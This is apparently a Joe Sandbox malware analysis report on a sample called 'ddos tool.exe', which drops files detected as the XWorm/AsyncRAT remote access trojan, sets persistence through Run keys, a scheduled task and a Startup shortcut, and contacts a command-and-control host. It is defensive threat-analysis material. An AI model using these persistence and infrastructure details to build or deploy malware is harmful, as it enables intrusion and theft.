                                                  https://aka.ms/pscore68powershell.exe, 00000005.00000002.2073386726.00000193B0FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.0000027500001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTeams.exe, 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2073386726.00000193B0FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.0000027500001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://go.mpowershell.exe, 00000005.00000002.2094410522.00000193C93BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.microspowershell.exe, 0000000D.00000002.2524316275.0000027571E50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          208.95.112.1
                                                          		ip-api.comUnited States
                                                          		53334TUT-ASUSfalse
                                                          147.185.221.24
                                                          		responsibility-popular.gl.at.ply.ggUnited States
                                                          		12087SALSGIVERUStrue

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1583946
                                                          Start date and time:2025-01-03 22:19:07 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 56s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:23
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:ddos tool.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@27/29@2/3
                                                          EGA Information:
                                                          • Successful, ratio: 12.5%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 96
                                                          • Number of non-executed functions: 5
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target SystemUser.dll, PID 1716 because it is empty
                                                          • Execution Graph export aborted for target SystemUser.dll, PID 5952 because it is empty
                                                          • Execution Graph export aborted for target ddos tool.exe, PID 3040 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 1888 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 2412 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 2796 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 5332 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • VT rate limit hit for: ddos tool.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          16:19:59API Interceptor54x Sleep call for process: powershell.exe modified
                                                          16:20:58API Interceptor2x Sleep call for process: svchost.exe modified
                                                          16:20:58API Interceptor2x Sleep call for process: OpenWith.exe modified
                                                          16:20:58API Interceptor243x Sleep call for process: Teams.exe modified
                                                          22:20:50Task SchedulerRun new task: SystemUser path: C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          22:20:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemUser C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          22:20:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemUser C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          22:21:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser.lnk

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          208.95.112.1kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                          • ip-api.com/json/
                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          file.exeGet hashmaliciousXWormBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          file.exeGet hashmaliciousXWormBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          23khy505ab.exeGet hashmaliciousNjratBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Java32.exeGet hashmaliciousXWormBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                          • ip-api.com/json/?fields=225545
                                                          intro.avi.exeGet hashmaliciousQuasarBrowse
                                                          • ip-api.com/json/
                                                          AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                          • ip-api.com/json/?fields=225545

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ip-api.comkthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                          • 208.95.112.1
                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                          • 208.95.112.1
                                                          file.exeGet hashmaliciousXWormBrowse
                                                          • 208.95.112.1
                                                          file.exeGet hashmaliciousXWormBrowse
                                                          • 208.95.112.1
                                                          23khy505ab.exeGet hashmaliciousNjratBrowse
                                                          • 208.95.112.1
                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 208.95.112.1
                                                          Java32.exeGet hashmaliciousXWormBrowse
                                                          • 208.95.112.1
                                                          mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                          • 208.95.112.1
                                                          intro.avi.exeGet hashmaliciousQuasarBrowse
                                                          • 208.95.112.1
                                                          AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                          • 208.95.112.1

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TUT-ASUSkthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                          • 208.95.112.1
                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                          • 208.95.112.1
                                                          file.exeGet hashmaliciousXWormBrowse
                                                          • 208.95.112.1
                                                          file.exeGet hashmaliciousXWormBrowse
                                                          • 208.95.112.1
                                                          23khy505ab.exeGet hashmaliciousNjratBrowse
                                                          • 208.95.112.1
                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 208.95.112.1
                                                          Java32.exeGet hashmaliciousXWormBrowse
                                                          • 208.95.112.1
                                                          mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                          • 208.95.112.1
                                                          intro.avi.exeGet hashmaliciousQuasarBrowse
                                                          • 208.95.112.1
                                                          AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                          • 208.95.112.1
                                                          SALSGIVERUSL988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                          • 147.185.221.24
                                                          ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                          • 147.185.221.24
                                                          p59UXHJRX3.exeGet hashmaliciousXenoRATBrowse
                                                          • 147.185.221.24
                                                          JdYlp3ChrS.exeGet hashmaliciousNjratBrowse
                                                          • 147.185.221.24
                                                          Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                          • 147.185.221.24
                                                          OneDrive.exeGet hashmaliciousQuasarBrowse
                                                          • 147.185.221.22
                                                          gReXLT7XjR.exeGet hashmaliciousNjratBrowse
                                                          • 147.185.221.18
                                                          _____.exeGet hashmaliciousDarkCometBrowse
                                                          • 147.185.221.23
                                                          test.exeGet hashmaliciousDarkCometBrowse
                                                          • 147.185.221.24
                                                          L363rVr7oL.exeGet hashmaliciousNjratBrowse
                                                          • 147.185.221.24

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.8307237210139873
                                                          Encrypted:false
                                                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug0:gJjJGtpTq2yv1AuNZRY3diu8iBVqFm
                                                          MD5:F5147BDEE058C118573802964C6C673F
                                                          SHA1:09823C9D53F89C52E1BB242E4E7E1E78179E6B27
                                                          SHA-256:6B4F536DDCB4953BE15239CC7EC3C662B1C9405EB602E0E4889A34694F5EE7DC
                                                          SHA-512:D539CDAA877EC5D59D38877ABAAF0D40BF34775E4050E12B057124B29AC214E4808E61BD0A93337DB9D0594A9749FF1077C3BAEDC7FDEC84DDF32D8CC2ACA947
                                                          Malicious:false
                                                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc3ca1bf9, page size 16384, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.6585829068027663
                                                          Encrypted:false
                                                          SSDEEP:1536:ZSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Zaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                          MD5:DE61333AA15FBA3EAF0A50A4FA644B67
                                                          SHA1:1BA4C56D4246A8491AC471B6037CB7C140E824B0
                                                          SHA-256:D03DAE04CA44501DA3EF45D86C43065A61A487184E35A9AFA9E26FC40FE9FBF4
                                                          SHA-512:BD6A9028FEAE3854EC5118027B1BB5856E4127C165427C4A9B86410AC5E32F9215067317F7679AA706F4524D0D07DC173AC4A42ECC1C2D2F6AF4C1C6A0BB7AE1
                                                          Malicious:false
                                                          Preview:....... ...............X\...;...{......................0.z..........{..:....}..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................1;....}....................`;....}...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.07945868539870285
                                                          Encrypted:false
                                                          SSDEEP:3:C4/lyYepSakGuAJkhvekl1eEkDallrekGltll/SPj:C4tyzpGrxlAElJe3l
                                                          MD5:7B87ACD8FBAF975F2F7CAC5DD27AC975
                                                          SHA1:10A63CBA96645022EA14838896BFF0D4CEF14D0D
                                                          SHA-256:D39FD9A848797E8B94DC72A2E44FE1821B95BD8B75B7441F22587847D7D357EC
                                                          SHA-512:A6E0EF1063B68D4C2D10299C8C0F89923F68A8E02522996D9613BA0B5746502D0A949A137F957273639577D76F47656908A7EA3F54FF88188C6167B1B2A24C70
                                                          Malicious:false
                                                          Preview:52.......................................;...{..;....}.......{...............{.......{...XL......{....................`;....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SystemUser.dll.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):654
                                                          Entropy (8bit):5.380476433908377
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Teams.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\Teams.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1727
                                                          Entropy (8bit):5.3718223239563105
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQwYHKGSI6o6+vxp3/elZHNpOtHTHhAHKKkt1qHGIs0HKD:iqbYqGSI6o9Zp/elZtpOtzHeqKktwmjB
                                                          MD5:9714380A7DC1A8945C07B6C9DC8312B0
                                                          SHA1:E6DF51F4C72B17485883378FDBF28D6BB5CFFDF3
                                                          SHA-256:1DD30FC94BA3D3F97B5F250110A2639430AEB51FAE7A252F886AE2401EC31D4B
                                                          SHA-512:876FB2C042F5FC60F6ACE9D143BA1A3AC9E200124EA3CB12476D10D24D82B4F2394F045E56FEB8906872D01B00BF9E646DEECC384144E21AEB6D6C10A365FB10
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ddos tool.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\ddos tool.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):654
                                                          Entropy (8bit):5.380476433908377
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................

                                                          C:\Users\user\AppData\Local\Temp\Log.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\Teams.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):41
                                                          Entropy (8bit):3.7195394315431693
                                                          Encrypted:false
                                                          SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                          MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                          SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                          SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                          SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                          Malicious:false
                                                          Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                          C:\Users\user\AppData\Local\Temp\SystemUser.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\Teams.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):191488
                                                          Entropy (8bit):5.565247941199071
                                                          Encrypted:false
                                                          SSDEEP:3072:1PZV7oFhVARcubgZyqokaO1FaHGVpYuAf:1Ml+cubgCHGLx
                                                          MD5:45AB951734AFA65081F4D0A6F8D2175E
                                                          SHA1:B5FEA20CE797DC2325B16E10C1B115ACF01EB8D5
                                                          SHA-256:315AE9AB63637F813AB39554F26DFE5A5D51A6C06A56AD3940767BB23B3DD68F
                                                          SHA-512:2048E7FF1706EC055E553330BFD5722DFDE98C25C1C46F5032BBE9C73EA92695645F6B9702A7E2506DDAD1A774787A73B83CFDF3CBF99F0DC372F80748D08C1B
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: Joe Security
                                                          • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: Sekoia.io
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: ditekSHen
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.ug.................8...........W... ...`....@.. .......................@............@..................................V..W....`...................... ....................................................... ............... ..H............text...$7... ...8.................. ..`.rsrc.......`.......:..............@..@.reloc....... ......................@..B.................W......H........b..........&.....................................................(....*.r...p*. ...*..(....*.r9..p*. .IB.*.s.........s.........s.........s.........*.rq..p*.r...p*. ..*.ra..p*. ~.H.*.r...p*. ..<.*.rQ..p*. ....*..((...*.r...p*. S...*.r`..p*. ..l.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. .=l.*.r`..p*. [.x.*.r...p*. '^..*.rP..p*. m.`.*.r...p*. W,O.*.r@..p*. .x!.*.r...p*. B\

                                                          C:\Users\user\AppData\Local\Temp\Teams.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\ddos tool.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):191488
                                                          Entropy (8bit):5.565247941199071
                                                          Encrypted:false
                                                          SSDEEP:3072:1PZV7oFhVARcubgZyqokaO1FaHGVpYuAf:1Ml+cubgCHGLx
                                                          MD5:45AB951734AFA65081F4D0A6F8D2175E
                                                          SHA1:B5FEA20CE797DC2325B16E10C1B115ACF01EB8D5
                                                          SHA-256:315AE9AB63637F813AB39554F26DFE5A5D51A6C06A56AD3940767BB23B3DD68F
                                                          SHA-512:2048E7FF1706EC055E553330BFD5722DFDE98C25C1C46F5032BBE9C73EA92695645F6B9702A7E2506DDAD1A774787A73B83CFDF3CBF99F0DC372F80748D08C1B
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: Joe Security
                                                          • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: Sekoia.io
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: ditekSHen
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.ug.................8...........W... ...`....@.. .......................@............@..................................V..W....`...................... ....................................................... ............... ..H............text...$7... ...8.................. ..`.rsrc.......`.......:..............@..@.reloc....... ......................@..B.................W......H........b..........&.....................................................(....*.r...p*. ...*..(....*.r9..p*. .IB.*.s.........s.........s.........s.........*.rq..p*.r...p*. ..*.ra..p*. ~.H.*.r...p*. ..<.*.rQ..p*. ....*..((...*.r...p*. S...*.r`..p*. ..l.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. .=l.*.r`..p*. [.x.*.r...p*. '^..*.rP..p*. m.`.*.r...p*. W,O.*.r@..p*. .x!.*.r...p*. B\

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpsnrhnd.eq2.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxpvbmou.k5k.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4ltwgbt.qcs.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ippsodkh.4hs.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
